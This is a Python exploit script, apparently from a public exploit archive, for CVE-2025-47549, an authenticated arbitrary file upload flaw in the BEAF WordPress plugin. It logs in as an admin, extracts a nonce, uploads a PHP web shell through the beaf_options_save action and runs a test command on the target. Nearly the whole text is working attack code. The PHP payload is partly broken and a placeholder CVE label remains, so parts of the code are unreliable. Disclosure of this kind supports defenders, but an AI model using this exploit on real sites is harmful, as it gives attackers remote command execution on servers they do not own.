# Exploit Title: Ultimate Before After Image Slider & Gallery – BEAF <= 4.6.10 - Authenticated (Admin+) Arbitrary File Upload via beaf_options_save # Date: 04/23/2025 # Exploit Author: Ryan Kozak https://ryankozak.com # Vendor Homepage: https://themefic.com/ # Version: <= 4.6.10 # Tested on: 4.6.10 # CVE: CVE-2025-47549 import re import json import urllib3 import requests import argparse import urllib.parse def extract_beaf_options_nonce(text): match = re.search(r']+id=["\']beaf_option_nonce["\'][^>]*value=["\']([^"\']+)["\']',text, re.IGNORECASE) if match: return match.group(1) else: print("Nonce not found.") return None def wp_login(victim_url: str, username: str, password: str): with requests.Session() as s: headers1 = { 'Cookie':'wordpress_test_cookie=WP Cookie check' } datas={ 'log':username, 'pwd':password, 'wp-submit':'Log In', 'redirect_to':f"{victim_url}/wp-admin", 'testcookie':'1' } s.post(f"{victim_url}/wp-login.php", headers=headers1, data=datas, verify=False) return(s) def main(): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Parse command line arguments parser = argparse.ArgumentParser(description="CVE-202X-XXXX: An exploit...") parser.add_argument("victim_url", help="Target url or ip address.") parser.add_argument("username", help="The username for the WordPress instance.") parser.add_argument("password", help="The password for the WordPress instance.") args = parser.parse_args() # Log into wprdpress and use this session for the requests. print(f"Logging into: {args.victim_url}/wp-admin") wp_session = wp_login(args.victim_url,args.username,args.password) ################################################################################################################################################## # Grab and prase the HTML for the nonce. ################################################################################################################################################## print("Extracting nonce values...") headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36'} r = wp_session.get(f"{args.victim_url}/wp-admin/edit.php?post_type=bafg&page=beaf_settings", headers=headers, verify=False) beaf_options_nonce = extract_beaf_options_nonce(r.text) ################################################################################################################################################## # Upload the malicious file. ################################################################################################################################################## print("Uploading web shell: shell.php") headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryEOPyTQ8r6Dr6gLSt"} data = "------WebKitFormBoundaryEOPyTQ8r6Dr6gLSt\r\n" data += "Content-Disposition: form-data; name=\"beaf_settings[wm_opacity]\"\r\n\r\n" data += "50\r\n" data += "------WebKitFormBoundaryEOPyTQ8r6Dr6gLSt\r\n" data += "Content-Disposition: form-data; name=\"beaf_option_nonce\"\r\n\r\n" data += beaf_options_nonce+"\r\n" data += "------WebKitFormBoundaryEOPyTQ8r6Dr6gLSt\r\n" data += "Content-Disposition: form-data; name=\"action\"\r\n\r\n" data += "beaf_options_save\r\n" data += "------WebKitFormBoundaryEOPyTQ8r6Dr6gLSt\r\n" data += "Content-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\n" data += "Content-Type: application/octet-stream\r\n\r\n" data += "\".shell_exec($_GET[\"cmd\"]).\"\";\n" data += "}\n" data += "------WebKitFormBoundaryEOPyTQ8r6Dr6gLSt--\r\n" r = wp_session.post(f"{args.victim_url}/wp-admin/admin-ajax.php", headers=headers, data=data, verify=False) print(r.text) ################################################################################################################################################## # Test Commands ################################################################################################################################################## print(f"Web Shell Location: {args.victim_url}/wp-content/uploads/itinerary-fonts/shell.php") print("") print("Executing test command: ip addr") r = requests.get(f"{args.victim_url}/wp-content/uploads/itinerary-fonts/shell.php?cmd=ip addr", verify=False) print(r.text) if __name__ == "__main__": main()